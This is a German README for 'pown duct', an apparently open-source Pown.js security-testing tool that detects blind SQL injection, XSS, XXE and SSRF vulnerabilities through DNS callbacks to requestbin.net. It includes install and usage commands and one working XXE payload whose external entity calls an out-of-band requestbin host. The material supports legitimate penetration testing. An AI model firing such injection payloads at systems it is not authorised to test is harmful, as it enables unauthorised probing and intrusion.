
Unverzichtbares Werkzeug zum Auffinden von Blind-Injection-Angriffen.
Wichtiges Werkzeug zum Auffinden von Blind-Injection-Angriffen mittels DNS-Seitenkanälen.
Dieses Tool ist Teil der Open-Source-Initiative von secapps.com.
___ ___ ___ _ ___ ___ ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com
NB: Dieses Tool nutzt den Dienst http://requestbin.net aus. Zukünftige Versionen werden eine eigene, speziell angepasste Infrastruktur verwenden.
Dieses Tool ist für die Verwendung als Teil von Pown.js gedacht, kann aber auch als eigenständiges Tool aufgerufen werden.
Installieren Sie zuerst Pown wie gewohnt:
$ npm install -g pown@latest
Direkt von Pown aus aufrufen:
$ pown duct
Alternativ installieren Sie dieses Modul lokal im Stammverzeichnis Ihres Projekts:
$ npm install @pown/duct --save
Rufen Sie danach die Pown-CLI auf:
$ ./node_modules/.bin/pown-cli duct
Sie können auch das globale Pown verwenden, um das Tool lokal aufzurufen:
$ POWN_ROOT=. pown duct
pown duct <command>
Side-channel attack enabler
Commands:
pown duct dns DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
pown duct dnspown duct dns
DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
--channel Restore channel [string]
--output Output format [string] [choices: "string", "hexdump", "json"] [default: "string"]
Es gibt Fälle, in denen wir einen Angriff wie SQL-Injection, XSS, XXE oder SSRF durchführen müssen, die Zielanwendung jedoch keinen Hinweis darauf gibt, dass sie verwundbar ist. Eine Möglichkeit, sicherzustellen, ob eine Schwachstelle vorhanden ist, besteht darin, einen gültigen Angriffsvektor zu injizieren, der einen DNS-Resolver dazu zwingt, eine kontrollierte Domain abzufragen. Wenn die Auflösung erfolgreich ist, gilt der Angriff als erfolgreich.
HINWEIS: Möglicherweise kennen Sie Burp Collaborator, das einen ähnlichen Dienst für Kunden bereitstellt.
Zuerst benötigen wir einen temporären DNS-Namen zur Auflösung:
$ pown duct dns
screenshot
Erstellen Sie mit dem bereitgestellten DNS Ihre Payload. Das folgende Beispiel könnte z. B. eine DNS-Auflösung auslösen, wenn eine XXE-Schwachstelle vorhanden ist.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
Wenn der Angriff erfolgreich war, erhalten wir eine Nachricht im Terminal.
screenshot